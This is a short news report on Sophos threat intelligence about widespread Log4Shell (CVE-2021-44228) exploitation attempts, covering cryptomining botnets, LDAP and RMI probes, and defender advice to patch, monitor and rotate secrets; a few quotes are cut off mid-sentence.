Security firm Sophos has provided new threat intelligence on how cyberattackers are already exploiting or attempting to exploit unpatched systems. This follows the reporting of the Apache Log4Shell vulnerability now officially denoted CVE-2021-44228
The Log4Shell Vulnerability involves sending a request to a vulnerable server in which includes some data – for example, an HTTP header – that is expected the server will write to its log file.
The Sophos threat intelligence as detailed in the SophosLabs Uncut report, Log4Shell Hell: Anatomy of an Exploit Outbreak, shows that Sophos is seeing a rapid uptick in attacks exploiting or attempting to exploit this vulnerability, with hundreds of thousands of attempts detected so far.
It also reveals that cryptomining botnets are among the earliest “attack” adopters; botnets focus on Linux server platforms, which are particularly exposed to this vulnerability. Sophos has also seen attempts to extract information from services, including Amazon Web Services keys and other private data. It has observed that attempts to exploit network services start by probing for different types.
Around 90 percent of the probes Sophos detected were focused on the Lightweight Directory Access Protocol (LDAP.) A smaller number of probes targeted Java’s Remote Interface (RMI,) but Sophos researchers noted that there seem to be a larger variety of unique RMI-related attempts
Sophos expects adversaries to intensify and diversify their attack methods and motivations in the coming days and weeks, including the possibility of leveraging for ransomware.
“The Log4Shell vulnerability presents a different kind of challenge for defenders. Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell
Sean adds that with the exception of cryptomining, there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability.
”We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on. ”
The most immediate priority for defenders he says is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems.
”This vulnerability can be everywhere. ”
”Where systems have been identified as vulnerable, defenders should run an incident response process and monitor for signs of remote access trojans such as C2 call-backs. Secrets stored on exposed systems should also be rotated, particularly if they are exposed in environment variables. Lastly, consider critical third party vendors who may also be at risk.” Sean adds.